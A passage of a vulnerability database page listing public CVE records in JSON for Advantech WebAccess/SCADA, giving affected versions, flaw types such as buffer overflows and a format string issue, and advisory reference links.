"CVE-2018-17908", "datePublished": "2018-10-29T18:00:00", "dateReserved": "2018-10-02T00:00:00", "dateUpdated": "2024-08-05T11:01:14.890Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10989
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-178-05 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-590/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-591/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.634Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-590/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-591/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple heap-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. Note: A different vulnerability than CVE-2019-10991." } ], "problemTypes": [ { "descriptions": [ { "description": "Buffer Overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:07", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-590/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-591/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10989", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple heap-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution. Note: A different vulnerability than CVE-2019-10991." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Buffer Overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-590/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-590/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-591/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-591/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10989", "datePublished": "2019-06-28T20:31:48", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.634Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12702
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/100526 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T18:43:56.457Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/100526" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-08-30T00:00:00", "descriptions": [ { "lang": "en", "value": "An Externally Controlled Format String issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. String format specifiers based on user provided input are not properly validated, which could allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-134", "description": "CWE-134", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-08-31T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/100526" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-12702", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Externally Controlled Format String issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. String format specifiers based on user provided input are not properly validated, which could allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-134" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-241-02" }, { "name": "100526", "refsource": "BID", "url": "http://www.securityfocus.com/bid/100526" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-12702", "datePublished": "2017-08-30T18:00:00", "dateReserved": "2017-08-09T00:00:00", "dateUpdated": "2024-08-05T18:43:56.457Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10991
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-178-05 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-592/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-620/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-588/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-586/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-594/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-589/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-619/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.589Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-592/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-620/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-588/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-586/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-594/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-589/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-619/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA, Versions 8.3.5 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "description": "Buffer Overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:08", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-592/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-620/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-588/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-586/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-594/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-589/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-619/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10991", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA, Versions 8.3.5 and prior, multiple stack-based buffer overflow vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Buffer Overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-592/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-592/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-620/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-620/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-588/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-588/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-586/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-586/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-594/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-594/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-589/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-589/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-619/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-619/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10991", "datePublished": "2019-06-28T20:25:56", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.589Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-6550
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-585/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | WebAccess/SCADA |
Version: Versions 8.3.5 and prior. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T20:23:21.543Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-585/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior." } ] } ], "datePublic": "2019-04-02T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:07", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-585/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-6550", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-19-092-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-585/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-585/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-6550", "datePublished": "2019-04-05T18:09:34", "dateReserved": "2019-01-22T00:00:00", "dateUpdated": "2024-08-04T20:23:21.543Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-10590
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securityfocus.com/bid/104190 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T07:39:08.449Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } ], "datePublic": "2018-05-15T00:00:00", "descriptions": [ { "lang": "en", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-548", "description": "INFORMATION EXPOSURE THROUGH DIRECTORY LISTING CWE-548", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-05-17T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "104190", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104190" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-05-15T00:00:00", "ID": "CVE-2018-10590", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess", "version": { "version_data": [ { "version_value": "WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, WebAccess/NMS 2.0.3 and prior." } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, an information exposure vulnerability through directory listing has been identified, which may allow an attacker to find important files that are not normally visible." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "INFORMATION EXPOSURE THROUGH DIRECTORY LISTING CWE-548" } ] } ] }, "references": { "reference_data": [ { "name": "104190", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104190" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-10590", "datePublished": "2018-05-15T22:00:00Z", "dateReserved": "2018-05-01T00:00:00", "dateUpdated": "2024-09-16T22:45:05.267Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-10987
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-19-178-05 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-584/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-19-587/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | WebAccess | WebAccess/SCADA |
Version: Versions 8.3.5 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T22:40:15.688Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-584/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-587/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "WebAccess", "versions": [ { "status": "affected", "version": "Versions 8.3.5 and prior" } ] } ], "datePublic": "2019-06-27T00:00:00", "descriptions": [ { "lang": "en", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple out-of-bounds write vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "description": "Other", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-07-02T16:06:08", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-584/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-587/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2019-10987", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "Versions 8.3.5 and prior" } ] } } ] }, "vendor_name": "WebAccess" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "In WebAccess/SCADA Versions 8.3.5 and prior, multiple out-of-bounds write vulnerabilities are caused by a lack of proper validation of the length of user-supplied data. Exploitation of these vulnerabilities may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Other" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-19-178-05" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-584/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-584/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-19-587/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-19-587/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2019-10987", "datePublished": "2019-06-28T20:49:28", "dateReserved": "2019-04-08T00:00:00", "dateUpdated": "2024-08-04T22:40:15.688Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2019-3975
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.tenable.com/security/research/tra-2019-41 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | WebAccess/SCADA |
Version: 8.4.1 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T19:26:27.639Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.tenable.com/security/research/tra-2019-41" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess/SCADA", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "8.4.1" } ] } ], "descriptions": [ { "lang": "en", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.1 allows a remote, unauthenticated attacker to execute arbitrary code via a crafted IOCTL 70603 RPC message." } ], "problemTypes": [ { "descriptions": [ { "description": "Unauthenticated Remote Stack Buffer Overflow", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2019-09-10T15:55:33", "orgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "shortName": "tenable" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.tenable.com/security/research/tra-2019-41" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "vulnreport@tenable.com", "ID": "CVE-2019-3975", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess/SCADA", "version": { "version_data": [ { "version_value": "8.4.1" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Stack-based buffer overflow in Advantech WebAccess/SCADA 8.4.1 allows a remote, unauthenticated attacker to execute arbitrary code via a crafted IOCTL 70603 RPC message." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Unauthenticated Remote Stack Buffer Overflow" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.tenable.com/security/research/tra-2019-41", "refsource": "MISC", "url": "https://www.tenable.com/security/research/tra-2019-41" } ] } } } }, "cveMetadata": { "assignerOrgId": "5ac1ecc2-367a-4d16-a0b2-35d495ddd0be", "assignerShortName": "tenable", "cveId": "CVE-2019-3975", "datePublished": "2019-09-10T15:55:33", "dateReserved": "2019-01-03T00:00:00", "dateUpdated": "2024-08-04T19:26:27.639Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2014-9208
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-15-251-01 | x_refsource_MISC | |
https://www.exploit-db.com/exploits/38108/ | exploit, x_refsource_EXPLOIT-DB |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T13:40:24.483Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-251-01" }, { "name": "38108", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/38108/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2015-09-08T00:00:00", "descriptions": [ { "lang": "en", "value": "Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2017-09-15T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-251-01" }, { "name": "38108", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/38108/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2014-9208", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Multiple stack-based buffer overflows in unspecified DLL files in Advantech WebAccess before 8.0.1 allow remote attackers to execute arbitrary code via unknown vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-15-251-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-251-01" }, { "name": "38108", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/38108/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2014-9208", "datePublished": "2015-09-11T16:00:00", "dateReserved": "2014-12-02T00:00:00", "dateUpdated": "2024-08-06T13:40:24.483Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-12711
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
